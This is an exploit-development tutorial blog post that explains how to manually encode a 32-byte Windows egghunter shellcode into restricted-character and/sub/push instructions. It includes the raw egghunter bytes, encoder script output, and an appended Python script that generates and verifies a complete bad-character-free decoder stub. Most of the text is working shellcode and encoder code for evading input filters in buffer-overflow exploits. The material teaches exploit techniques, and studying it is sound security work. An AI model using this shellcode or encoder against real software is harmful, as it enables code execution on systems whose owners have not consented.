You are probably wondering what this post is all about, well….it’s about manually encoding egghunter shellcode.
Why would you want to manually encode the shellcode when you have built-in encoders in the Metasploit framework?
What I’m about to show here are the calculations needed to make our shellcode free of bad chars; doing it manually can be a pain….
Due to the large number of bad characters we need to manually encode the egghunter using a limited set of allowed chars, and with Python we can have a script do the calculations for us.
Again, I assume you watched the Offsec video and read the tutorials and already know what we are about to do here.
Detailed information about egghunters can be found in this document by skape :
or get them compiled to binaries here:
- egghunt.exe (52 kB): compiled egghunter
- egghunt_syscall.exe (52 kB): compiled syscall egghunter
2. Generate the egghunter shellcode
C:\>egghunt.exe cstyle 0x57303054
// 32 byte egghunt shellcode (egg=0x57303054)
unsigned char egghunt[] = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
3. breaking down our 32 byte egghunter shellcode into 8 sets of 4 bytes
"\x66\x81\xca\xff"
"\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e"
"\x3c\x05\x5a\x74"
"\xef\xb8\x54\x30"
"\x30\x57\x8b\xfa"
"\xaf\x75\xea\xaf"
"\x75\xe7\xff\xe7"
4. We will use the following value as an example:
"\x0f\x42\x52\x6a"
Read as a little-endian dword this is 0x6a52420f. Since EAX is first zeroed and the value is then built by subtracting three numbers from it, what we need is the two's complement of the dword:
0xFFFFFFFF – 0x6a52420f + 1 = 0x95ADBDF1
We need to find three numbers (made only of bytes from the allowed character set) which, when added, give 0x95ADBDF1; subtracting all three from zero leaves 0x6a52420f in EAX, ready to be pushed.
Instead of calculating this manually we will use a custom made python script.
Now let's split it in two, 95AD and BDF1, and feed these values into our script:
* The script contains a list of allowed chars and will use it for its calculations
exploit~#python encoder.py
Usage: encoder.py <hex value>
exploit~#python encoder.py 95AD
Got It!!
0x7f7f 0x152d 0x0101
exploit~#python encoder.py BDF1
Got It!!
0x7f7f 0x3d71 0x0101
Putting the two halves back together gives us three dwords:
7f7f7f7f
152d3d71
01010101
Let's add our results and voila, we now have values made from the allowed char set only:
7f7f7f7f + 152d3d71 + 01010101 = 0x95ADBDF1
Note that solving the two halves separately only works because the low half adds up without a carry (7f7f + 3d71 + 0101 = BDF1 exactly); had it carried, the high half would have to be solved for 95AC instead of 95AD, so always check the carry when you glue the halves back together.
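The following Python script is an added example and is not the post's encoder.py: it performs the same two's-complement/three-way split for every 4-byte group of the egghunter, but byte by byte with carries, so no manual half-splitting or carry checking is needed, and it emits the and/sub/push decoder stub and checks it by simulating it. The allowed-character set (0x01 to 0x7f, i.e. no NUL and no high-bit bytes) is an assumption made here because the post's own list is not shown; the two AND masks are a well-known pair of bitwise-disjoint printable dwords, not something taken from the post.

```python
import struct

# Assumption for this example: the post's own allowed-character list is not
# shown, so we allow 0x01..0x7f (no NUL, no high-bit bytes), which matches
# every value the post's encoder.py printed.
ALLOWED = frozenset(range(0x01, 0x80))
_ALLOWED_SORTED = sorted(ALLOWED)

# The 32-byte egghunter exactly as egghunt.exe printed it above (egg 0x57303054).
EGGHUNTER = bytes.fromhex(
    "6681caff0f42526a0258cd2e3c055a74ef"           # or dx,0xfff ... je back
    "b854303057" "8bfa" "af75ea" "af75e7" "ffe7"   # mov eax,egg ... jmp edi
)

# Two masks whose bitwise AND is zero and whose bytes are all allowed:
# "and eax, m1 ; and eax, m2" zeroes EAX no matter what it held.
AND_MASKS = (0x554e4d4a, 0x2a313235)


def _split_byte(want, carry):
    """Find allowed bytes a, b, c with (a + b + c + carry) & 0xff == want.
    Returns (a, b, c, carry_out) where carry_out = (a + b + c + carry) >> 8."""
    for k in range(2):                      # a+b+c+carry < 512, so carry_out is 0 or 1
        total = want + 256 * k - carry      # what a + b + c itself must equal
        for a in _ALLOWED_SORTED:
            for b in _ALLOWED_SORTED:
                c = total - a - b
                if c in ALLOWED:
                    return a, b, c, k
    raise ValueError("byte %#04x not representable with this charset" % want)


def three_way_split(target):
    """Return (x1, x2, x3), all bytes allowed, with (x1+x2+x3) mod 2**32 == target.
    Solved one byte at a time from the least significant byte, carrying into
    the next, so the dword never has to be split into halves by hand."""
    parts = [0, 0, 0]
    carry = 0
    for i in range(4):
        a, b, c, carry = _split_byte((target >> (8 * i)) & 0xff, carry)
        for j, v in enumerate((a, b, c)):
            parts[j] |= v << (8 * i)
    return tuple(parts)


def encode_dword(dword):
    """Decoder stub for one dword: zero EAX, subtract the three parts so that
    EAX == dword, push it.  Returns (stub_bytes, (x1, x2, x3))."""
    target = (-dword) & 0xffffffff          # two's complement, as in the post
    parts = three_way_split(target)
    stub = b"".join(b"\x25" + struct.pack("<I", m) for m in AND_MASKS)  # and eax, imm32
    stub += b"".join(b"\x2d" + struct.pack("<I", x) for x in parts)     # sub eax, imm32
    stub += b"\x50"                                                      # push eax
    return stub, parts


def encode(shellcode):
    """Sub-encode a payload whose length is a multiple of 4.  The last dword
    is pushed first: the stack grows down, so the pushes rebuild the payload
    in memory in its original order (this assumes ESP was already moved to
    just past the end of this decoder, so the rebuilt payload runs next)."""
    if len(shellcode) % 4:
        raise ValueError("pad the payload to a multiple of 4 bytes")
    out = b""
    for off in range(len(shellcode) - 4, -1, -4):
        dword = struct.unpack("<I", shellcode[off:off + 4])[0]
        out += encode_dword(dword)[0]
    return out


def is_clean(code):
    """True when every byte of the encoded stub is in the allowed set."""
    return all(b in ALLOWED for b in code)


def simulate(code):
    """Model just the three opcodes the encoder emits (and/sub/push) and return
    the bytes the pushes leave on the stack, lowest address first."""
    eax, stack, i = 0xdeadbeef, b"", 0      # EAX starts as garbage on purpose
    while i < len(code):
        op, imm = code[i], code[i + 1:i + 5]
        if op == 0x25:                      # and eax, imm32
            eax &= struct.unpack("<I", imm)[0]; i += 5
        elif op == 0x2d:                    # sub eax, imm32
            eax = (eax - struct.unpack("<I", imm)[0]) & 0xffffffff; i += 5
        elif op == 0x50:                    # push eax
            stack = struct.pack("<I", eax) + stack; i += 1
        else:
            raise ValueError("unexpected opcode %#04x at offset %d" % (op, i))
    return stack


if __name__ == "__main__":
    stub, parts = encode_dword(0x6a52420f)  # the post's "\x0f\x42\x52\x6a" example
    print("sub eax parts: " + " ".join("0x%08x" % p for p in parts))
    encoded = encode(EGGHUNTER)
    print("%d-byte encoded hunter, clean=%s, round-trips=%s"
          % (len(encoded), is_clean(encoded), simulate(encoded) == EGGHUNTER))
    print("".join("\\x%02x" % b for b in encoded))
```

Each 4-byte group costs 26 bytes of decoder (two ANDs, three SUBs, one PUSH), so the 32-byte hunter grows to 208 bytes; the simulate() round-trip is the check worth keeping in your own script, since a single wrong carry silently corrupts one byte of the rebuilt egghunter.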